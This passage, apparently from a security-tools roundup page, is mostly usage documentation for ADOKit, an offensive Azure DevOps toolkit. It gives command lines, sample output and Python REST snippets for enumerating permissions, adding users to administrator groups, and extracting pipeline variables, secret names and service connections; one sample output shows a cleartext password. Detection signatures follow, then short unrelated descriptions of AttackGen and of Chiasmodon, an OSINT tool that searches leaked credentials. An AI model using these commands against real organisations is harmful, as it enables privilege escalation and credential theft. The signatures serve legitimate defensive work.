4/4/23 13:11:09 Finished execution of getgroupmembers
Get a listing of who has permissions to a given project.
Provide the getpermissions
module and the project you would like to search for in the /project:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.
ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"
ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"
C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[*] INFO: Listing group members for each group that has permissions to this project
GROUP NAME: [MaraudersMap]\Build Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Contributors
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributors | user1@YourOrganization.onmicrosoft.com | User 1
[MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2
GROUP NAME: [MaraudersMap]\MaraudersMap Team
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Valid Users
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Readers
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 13:11:18 Finished execution of getpermissions
Add a user to the Project Administrators group for a given project.
Provide the addprojectadmin
module along with a /project:
and /user:
for a given user to be added to the Project Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 2:52:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 18:52:47 Finished execution of addprojectadmin
Remove a user from the Project Administrators group for a given project.
Provide the removeprojectadmin
module along with a /project:
and /user:
for a given user to be removed from the Project Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:19:43 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 19:19:44 Finished execution of removeprojectadmin
Add a user to the Build Administrators group for a given project.
Provide the addbuildadmin
module along with a /project:
and /user:
for a given user to be added to the Build Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:41:51 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 19:41:55 Finished execution of addbuildadmin
Remove a user from the Build Administrators group for a given project.
Provide the removebuildadmin
module along with a /project:
and /user:
for a given user to be removed from the Build Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:42:10 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------
4/4/23 19:42:11 Finished execution of removebuildadmin
Add a user to the Project Collection Administrators group.
Provide the addcollectionadmin
module along with a /user:
for a given user to be added to the Project Collection Administrators
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:04:40 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 20:04:43 Finished execution of addcollectionadmin
Remove a user from the Project Collection Administrators group.
Provide the removecollectionadmin
module along with a /user:
for a given user to be removed from the Project Collection Administrators
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:10:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 20:10:38 Finished execution of removecollectionadmin
Add a user to the Project Collection Build Administrators group.
Provide the addcollectionbuildadmin
module along with a /user:
for a given user to be added to the Project Collection Build Administrators
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:39 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
----------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:21:42 Finished execution of addcollectionbuildadmin
Remove a user from the Project Collection Build Administrators group.
Provide the removecollectionbuildadmin module with a /user: argument naming the user to remove from the Project Collection Build Administrators group, plus any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------
4/5/23 12:22:02 Finished execution of removecollectionbuildadmin
Add a user to the Project Collection Build Service Accounts group.
Provide the addcollectionbuildsvc module with a /user: argument naming the user to add to the Project Collection Build Service Accounts group, plus any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:13 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:22:15 Finished execution of addcollectionbuildsvc
Remove a user from the Project Collection Build Service Accounts group.
Provide the removecollectionbuildsvc module with a /user: argument naming the user to remove from the Project Collection Build Service Accounts group, plus any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:27 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------
4/5/23 12:22:28 Finished execution of removecollectionbuildsvc
Add a user to the Project Collection Service Accounts group.
Provide the addcollectionsvc module with a /user: argument naming the user to add to the Project Collection Service Accounts group, plus any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:01 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 15:21:04 Finished execution of addcollectionsvc
Remove a user from the Project Collection Service Accounts group.
Provide the removecollectionsvc module with a /user: argument naming the user to remove from the Project Collection Service Accounts group, plus any relevant authentication information and the target URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:43 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/5/23 15:21:44 Finished execution of removecollectionsvc
Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.
Provide the getpipelinevars module with a /project: argument naming the project whose pipeline variables you want to extract. To extract pipeline variables from every project, specify all in the /project: argument.
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/6/2023 12:08:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/
4/6/23 16:08:36 Finished execution of getpipelinevars
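For context, this listing maps onto the documented Azure DevOps REST API (linked in the references at the end of this section). Below is a minimal sketch that pulls build-definition variables with plain requests, assuming a PAT and the organization/project names from the example above; it illustrates the underlying API, not ADOKit's implementation.

```python
# Minimal sketch: list build-definition (pipeline) variables via the
# Azure DevOps REST API. Illustrative only -- not ADOKit's implementation.
import base64
import requests

ORG, PROJECT = "YourOrganization", "maraudersmap"   # assumed names
PAT = "apiKey"                                      # assumed PAT
AUTH = {"Authorization": "Basic " + base64.b64encode(f":{PAT}".encode()).decode()}

url = (f"https://dev.azure.com/{ORG}/{PROJECT}/_apis/build/definitions"
       "?includeAllProperties=true&api-version=7.1-preview.7")
for definition in requests.get(url, headers=AUTH).json()["value"]:
    for name, var in (definition.get("variables") or {}).items():
        # Variables flagged isSecret come back without a readable value.
        print(name, "=", "[secret]" if var.get("isSecret") else var.get("value"))
```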
Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.
Provide the getpipelinesecrets module with a /project: argument naming the project whose pipeline secret names you want to extract. To extract the names of pipeline secrets from every project, specify all in the /project: argument.
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/10/2023 10:28:37 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]
4/10/23 14:28:38 Finished execution of getpipelinesecrets
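Secrets are also commonly stored in variable groups; below is a companion sketch against the documented variable-groups endpoint, under the same PAT and naming assumptions as the previous snippet (illustrative only).

```python
# Minimal sketch: list variable-group entries and flag the secret ones.
import base64
import requests

ORG, PROJECT = "YourOrganization", "maraudersmap"   # assumed names
PAT = "apiKey"                                      # assumed PAT
AUTH = {"Authorization": "Basic " + base64.b64encode(f":{PAT}".encode()).decode()}

url = (f"https://dev.azure.com/{ORG}/{PROJECT}/_apis/distributedtask/variablegroups"
       "?api-version=7.1-preview.2")
for group in requests.get(url, headers=AUTH).json()["value"]:
    for name, var in group.get("variables", {}).items():
        # As in the output above, secret values are never returned in clear text.
        print(group["name"], "|", name, "|",
              "[HIDDEN]" if var.get("isSecret") else var.get("value"))
```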
List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.
Provide the getserviceconnections module with a /project: argument naming the project whose service connections you want to list. To list service connections used across every project, specify all in the /project: argument.
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/11/2023 8:34:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382
4/11/23 12:34:16 Finished execution of getserviceconnections
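The same listing is exposed by the documented service-endpoint REST API; below is a minimal sketch under the same PAT and naming assumptions as the previous snippets (illustrative only).

```python
# Minimal sketch: list a project's service connections (name, type, id).
import base64
import requests

ORG, PROJECT = "YourOrganization", "maraudersmap"   # assumed names
PAT = "apiKey"                                      # assumed PAT
AUTH = {"Authorization": "Basic " + base64.b64encode(f":{PAT}".encode()).decode()}

url = (f"https://dev.azure.com/{ORG}/{PROJECT}/_apis/serviceendpoint/endpoints"
       "?api-version=7.1-preview.4")
for ep in requests.get(url, headers=AUTH).json()["value"]:
    print(ep["name"], "|", ep["type"], "|", ep["id"])
```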
Below are static signatures for the specific usage of this tool in its default state:

- {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
- ADOKit-21e233d4334f9703d1a3a42b6e2efd38
- ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
- PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.
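Since the first two signatures above are static strings, defenders can sweep exported proxy or web-server logs for them; below is a minimal grep-style sketch (the log filename is a placeholder).

```python
# Minimal sketch: sweep an exported log for ADOKit's static indicators.
INDICATORS = (
    "{60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}",
    "ADOKit-21e233d4334f9703d1a3a42b6e2efd38",
)

with open("proxy_export.log", encoding="utf-8", errors="replace") as fh:  # placeholder file
    for lineno, line in enumerate(fh, 1):
        if any(indicator in line for indicator in INDICATORS):
            print(f"{lineno}: {line.rstrip()}")
```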
https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops
AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.
If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐
What's new? | Why is it useful? |
---|---|
Mistral API Integration | - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case. |
Local Model Support using Ollama | - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app |
Optional LangSmith Integration | - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith. |
Various Bug Fixes and Improvements | - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust. |
What's new? | Why is it useful? |
---|---|
Azure OpenAI Service Integration | - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements. - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models. |
LangSmith for Azure OpenAI Service | - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios. - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction. |
Model Selection for OpenAI API | - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview . This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case. |
Docker Container Image | - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform. |
What's new? | Why is it useful? |
---|---|
Custom Scenarios based on ATT&CK Techniques | - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group. - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture. |
User feedback on generated scenarios | - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks. |
Improved error handling for missing API keys | - Improved user experience. |
Replaced Streamlit st.spinner widgets with new st.status widget | - Provides better visibility into long running processes (i.e. scenario generation). |
Initial release.

AttackGen requires a small set of Python packages (including langchain and mitreattack) plus two data files: enterprise-attack.json (the MITRE ATT&CK dataset in STIX format) and groups.json.

```bash
git clone https://github.com/mrwadams/attackgen.git
cd attackgen
pip install -r requirements.txt
```
docker pull mrwadams/attackgen
If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.
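For reference, the file can be as small as a single key; below is a minimal sketch of .streamlit/secrets.toml. Only LANGCHAIN_API_KEY is taken from the text above; any provider keys your setup needs should follow the secrets.toml-example template.

```toml
# .streamlit/secrets.toml -- minimal sketch; leave the value empty if you do
# not use LangSmith (see the note above).
LANGCHAIN_API_KEY = ""
```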
Download the latest version of the MITRE ATT&CK dataset in STIX format from here, and be sure to place this file in the ./data/ directory within the repository.
After the data setup, you can run AttackGen with the following command:

```bash
streamlit run 👋_Welcome.py
```

You can also try the app on Streamlit Community Cloud.

If you are using the Docker image instead:

1. Run the container: `docker run -p 8501:8501 mrwadams/attackgen`. This command will start the container and map port 8501 (the default for Streamlit apps) from the container to your host machine.
2. Open your web browser and navigate to http://localhost:8501.
3. Use the app to generate standard or custom incident response scenarios (see below for details).
To generate a standard scenario, use the Threat Group Scenarios page; to build a scenario from specific ATT&CK techniques, use the Custom Scenario page. Both pages read your API keys from the .streamlit/secrets.toml file. Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.
I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.
This project is licensed under GNU GPLv3.
Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about a target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. The tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.
Phone: Get ready to uncover even more valuable data by searching for information associated with phone numbers. Whether you're investigating a particular individual or looking for connections between phone numbers and other entities, this new feature will provide you with valuable insights.
Company Name: We understand the importance of comprehensive company research. In our upcoming release, you'll be able to search by company name and access a wide range of documents associated with that company. This feature will provide you with a convenient and efficient way to gather crucial information, such as legal documents, financial reports, and other relevant records.
Face (Photo): Visual data is a powerful tool, and we are excited to introduce our advanced facial recognition feature. With "Search by Face (Photo)," you can upload an image containing a face and leverage cutting-edge technology to identify and match individuals across various data sources. This will allow you to gather valuable information, such as social media profiles, online presence, and potential connections, all through the power of facial recognition.
